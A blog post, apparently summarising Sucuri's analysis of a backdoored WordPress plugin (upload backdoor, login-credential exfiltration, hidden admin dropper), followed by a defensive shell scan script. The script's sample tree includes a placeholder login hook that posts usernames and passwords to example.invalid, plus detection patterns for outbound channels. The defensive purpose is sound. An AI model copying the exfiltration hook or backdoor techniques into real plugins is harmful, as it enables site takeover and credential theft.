article, the plugin shows more than 10,000 active installations in the WordPress.org statistics. Even so, it looked abandoned: there had been no update for ten months. Two weeks ago, however, an update appeared in which the plugin's author changed and a user named wooranker was added.

In that update, wooranker added a file named auto-update.php, which lets anyone upload an arbitrary file into the plugins directory and save it with a .php extension. Since the web server executes anything with that extension under the plugins directory, this is a remote code execution backdoor, not just an upload bug.
That is not all. The same update created a file named CCTM_Comunicator.php and added a new function to the plugin's index.php.

On every login, the function and the file record the username and the password that was entered and send them to a remote address.

After the plugin update, wooranker therefore has a ready-made backdoor on every site that installed it, and can collect its login credentials at the same time.
No less interesting is the scenario described later in the article.

Using the backdoor, the attacker uploaded a file c.php into the plugins directory. Its only job is to create a file wp-options.php in the WordPress root directory; the name is chosen to blend in with the core's own wp-*.php files. That file includes the core files it needs and creates a user with administrator privileges. In the process, c.php is deleted, so the dropper itself leaves no trace in the plugins directory.
The greatest danger is for sites with automatic plugin updates enabled: the backdoored version is installed without anyone looking at it, and you have a compromised site without knowing it. Turning updates off is not the answer either, because that leaves known vulnerabilities open; what helps is noticing when a plugin changes owner after a long silence and checking what an update actually changed before trusting it.
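As an added example (not code from the original post or from Sucuri's write-up), the following shell script turns the indicators above into a check you can run against a WordPress install. It looks for the file names named in the text, lists non-core PHP files in the WordPress root (the generic form of the wp-options.php dropper, whatever the file is called), flags plugin files that hook the login flow and also contain a way to send data out (the CCTM_Comunicator.php pattern), and lists plugin PHP files modified within the last two weeks. The indicator file names, the 14-day window, the core-file allowlist and the sample site tree it builds under mktemp are all assumptions for illustration; the sample tree is constructed here and is not a real install.

```shell
#!/bin/sh
# Added example, not code from the original post or from Sucuri: an
# indicator scan for the backdoor pattern the text describes. Assumptions
# for illustration: the file names below are the ones the text names, the
# "recent" window is 14 days, and the sample site tree is constructed here.

PLUGIN_IOCS="auto-update.php CCTM_Comunicator.php c.php"   # dropped into plugins/
ROOT_IOCS="wp-options.php"                                   # dropped into the WP root
RECENT_DAYS=14

# PHP files that legitimately live in a WordPress root (core allowlist).
CORE_ROOT_PHP="index.php wp-activate.php wp-blog-header.php wp-comments-post.php
wp-config.php wp-config-sample.php wp-cron.php wp-links-opml.php wp-load.php
wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php"

# Check 1: the exact indicator file names, in the plugins tree and the root.
find_ioc_files() {
  root="$1"
  for f in $PLUGIN_IOCS; do
    find "$root/wp-content/plugins" -type f -name "$f" 2>/dev/null || true
  done
  for f in $ROOT_IOCS; do
    if [ -f "$root/$f" ]; then printf '%s\n' "$root/$f"; fi
  done
  return 0
}

# Check 2: any PHP file in the root that is not a core file. A dropper can
# pick any name, but it sits in the root so it can include wp-load.php.
find_unexpected_root_php() {
  root="$1"
  core_list=$(printf '%s' "$CORE_ROOT_PHP" | tr '\n' ' ')
  for p in "$root"/*.php; do
    [ -f "$p" ] || continue
    name=$(basename "$p")
    case " $core_list " in
      *" $name "*) ;;                 # known core file, skip
      *) printf '%s\n' "$p" ;;        # anything else is worth a look
    esac
  done
  return 0
}

# Check 3: plugin files that hook the login flow AND contain an outbound
# channel. Legitimate 2FA/login-limiting plugins hook the same actions, so
# this is a review list, not a verdict.
find_credential_hooks() {
  root="$1"
  grep -rlE --include='*.php' \
    "add_(action|filter)[[:space:]]*\([[:space:]]*['\"](wp_login|wp_authenticate|authenticate)" \
    "$root/wp-content/plugins" 2>/dev/null |
  while IFS= read -r f; do
    if grep -qE "wp_remote_(post|get|request)|curl_init|fsockopen|file_get_contents[[:space:]]*\([[:space:]]*['\"]https?://" "$f"; then
      printf '%s\n' "$f"
    fi
  done
  return 0
}

# Check 4: plugin PHP files touched within the window (the update was two weeks old).
find_recent_plugin_php() {
  root="$1"
  find "$root/wp-content/plugins" -type f -name '*.php' -mtime "-$RECENT_DAYS" 2>/dev/null || true
  return 0
}

# Distinct findings from checks 1-3 (check 4 is context, not a finding).
count_findings() {
  root="$1"
  { find_ioc_files "$root"; find_unexpected_root_php "$root"; find_credential_hooks "$root"; } |
    sort -u | wc -l | tr -d ' '
  return 0
}

# Constructed sample site (not a real install): a clean plugin, the three
# dropped plugin files the text describes, and a wp-options.php in the root.
make_sample_tree() {
  root=$(mktemp -d)
  mkdir -p "$root/wp-content/plugins/custom-content-type-manager" "$root/wp-content/plugins/clean-plugin"
  for f in index.php wp-load.php wp-login.php wp-config.php; do
    printf '<?php // core placeholder\n' > "$root/$f"
  done
  printf '<?php // a normal plugin\nadd_action("init", "cp_init");\n' > "$root/wp-content/plugins/clean-plugin/clean-plugin.php"
  p="$root/wp-content/plugins/custom-content-type-manager"
  printf '<?php // upload endpoint placeholder\n' > "$p/auto-update.php"
  # login hook plus outbound request in one file: the credential-theft pattern
  printf '<?php\nadd_action("wp_authenticate", "cctm_send", 10, 2);\nfunction cctm_send($u, $p) { wp_remote_post("http://example.invalid/", array("body" => array("u" => $u, "p" => $p))); }\n' > "$p/CCTM_Comunicator.php"
  printf '<?php // dropper placeholder\n' > "$p/c.php"
  printf '<?php // dropper output placeholder\n' > "$root/wp-options.php"
  printf '%s\n' "$root"
}

# Usage: sh cctm-scan.sh /path/to/wordpress   (no argument: scan the sample tree)
target="${1:-}"
if [ -z "$target" ]; then target=$(make_sample_tree); fi
echo "indicator files:";                          find_ioc_files "$target"
echo "non-core PHP in root:";                     find_unexpected_root_php "$target"
echo "login hooks with an outbound channel:";     find_credential_hooks "$target"
echo "plugin PHP modified in last $RECENT_DAYS days:"; find_recent_plugin_php "$target"
echo "findings: $(count_findings "$target")"
```

Every hit from the login-hook check needs a human look, since two-factor and login-throttling plugins hook wp_login and authenticate for legitimate reasons; the question is whether the same file also sends data somewhere. Compare flagged plugin files against a fresh copy from WordPress.org (or run `wp plugin verify-checksums`), and check `wp user list --role=administrator` for accounts nobody on your team created, which is what the wp-options.php dropper leaves behind.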
The last part of the article is also excellent: with fairly simple means, the authors uncover the identity of a certain developer who is behind the attack.
Source: https://blog.sucuri.net/2016/03/when-wordpress-plugin-goes-bad.html
Excerpt: In yesterday's article, security specialists from Sucuri reported that a backdoor allowing your website to be taken over had been inserted into the popular Custom Content Type Manager plugin.